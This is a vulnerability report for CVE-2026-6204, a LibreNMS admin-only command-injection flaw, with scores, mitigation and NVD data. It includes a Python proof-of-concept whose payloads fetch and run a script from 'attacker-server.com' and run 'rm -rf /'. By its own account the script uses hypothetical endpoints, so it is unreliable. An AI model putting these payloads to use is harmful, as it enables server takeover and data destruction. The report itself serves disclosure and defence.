Security Vulnerability Report
CVE-2026-6204 CVSS 7.2 HIGH

CVE-2026-6204

Published: 2026-04-13 11:16:06
Last Modified: 2026-04-22 19:47:47
Source: ab69c47f-b95e-4bf2-b2d9-4b1fd1b24b4a

Description

LibreNMS versions before 26.3.0 are affected by an authenticated remote code execution vulnerability by abusing the Binary Locations config and the Netcommand feature. Successful exploitation requires administrative privileges. Exploitation could result in compromise of the underlying web server. The weakness is classed as CWE-78 (OS command injection): an administrator-controlled binary path is passed to a command the server later runs. Mitigation: upgrade to 26.3.0 or later (the first version outside the affected range below); until then, keep administrative accounts to a minimum and audit changes to the Binary Locations settings.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H (primary, NVD). Note that the reporting CNA also supplies a secondary CVSS 4.0 vector, CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N, scoring 8.5 HIGH — the same attack path, rated with no availability impact. PR:H in both vectors reflects that an administrator account is required.

Configurations (Affected Products)

cpe:2.3:a:librenms:librenms:*:*:*:*:*:*:*:* - VULNERABLE
LibreNMS < 26.3.0 (all releases before 26.3.0, per versionEndExcluding; 26.3.0 is the first release outside the affected range)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. It requires an administrator account on the target, and the endpoint paths and form field names it uses are hypothetical — confirm them against the referenced advisory and the target's own UI/API before relying on it.
python
# PoC Concept for CVE-2026-6204 # This script demonstrates how an authenticated admin might exploit the Binary Location configuration. import requests # Target configuration target_url = "http://librenms-example.com" username = "admin" password = "your_admin_password" # Initialize session session = requests.Session() # 1. Login to obtain session cookie login_payload = { "username": username, "password": password } session.post(f"{target_url}/login", data=login_payload) # 2. Update Binary Location configuration # Exploit: Changing 'fping' path to a malicious command # Depending on the specific UI/API endpoint, the parameter names may vary. config_payload = { "fping": "/bin/bash -c 'curl http://attacker-server.com/shell.sh | bash'", "fping6": "/bin/bash -c 'rm -rf /'" # Example of destructive command } # Sending the configuration update request # Endpoint is hypothetical based on standard LibreNMS structure response = session.post(f"{target_url}/settings/ binaries/update", data=config_payload) if response.status_code == 200: print("[+] Configuration updated successfully.") # 3. Trigger Exploitation # Force LibreNMS to execute the Netcommand (e.g., by adding a dummy device) trigger_payload = { "hostname": "192.168.1.100", "type": "server", "snmp": "on" } session.post(f"{target_url}/addhost", data=trigger_payload) print("[+] Triggered Netcommand. Check your listener.") else: print("[-] Failed to update configuration.")

References

- Vendor advisory (GitHub Security Advisory): https://github.com/librenms/librenms/security/advisories/GHSA-pr3g-phhr-h8fh
- Third-party write-up with exploit details (tagged "Exploit" in NVD): https://projectblack.io/blog/librenms-authenticated-rce-and-xss/#binary-path-rce-poc

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-6204", "sourceIdentifier": "ab69c47f-b95e-4bf2-b2d9-4b1fd1b24b4a", "published": "2026-04-13T11:16:06.243", "lastModified": "2026-04-22T19:47:46.537", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LibreNMS versions before 26.3.0 are affected by an authenticated remote code execution vulnerability by abusing the Binary Locations config and the Netcommand feature. Successful exploitation requires administrative privileges. Exploitation could result in compromise of the underlying web server."}], "metrics": {"cvssMetricV40": [{"source": "ab69c47f-b95e-4bf2-b2d9-4b1fd1b24b4a", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", 
"Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "ab69c47f-b95e-4bf2-b2d9-4b1fd1b24b4a", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:librenms:librenms:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.3.0", "matchCriteriaId": "A43AE03C-7129-4F1F-B01C-28637F82A1B4"}]}]}], "references": [{"url": "https://github.com/librenms/librenms/security/advisories/GHSA-pr3g-phhr-h8fh", "source": "ab69c47f-b95e-4bf2-b2d9-4b1fd1b24b4a", "tags": ["Third Party Advisory"]}, {"url": "https://projectblack.io/blog/librenms-authenticated-rce-and-xss/#binary-path-rce-poc", "source": "ab69c47f-b95e-4bf2-b2d9-4b1fd1b24b4a", "tags": ["Exploit", "Third Party Advisory"]}]}}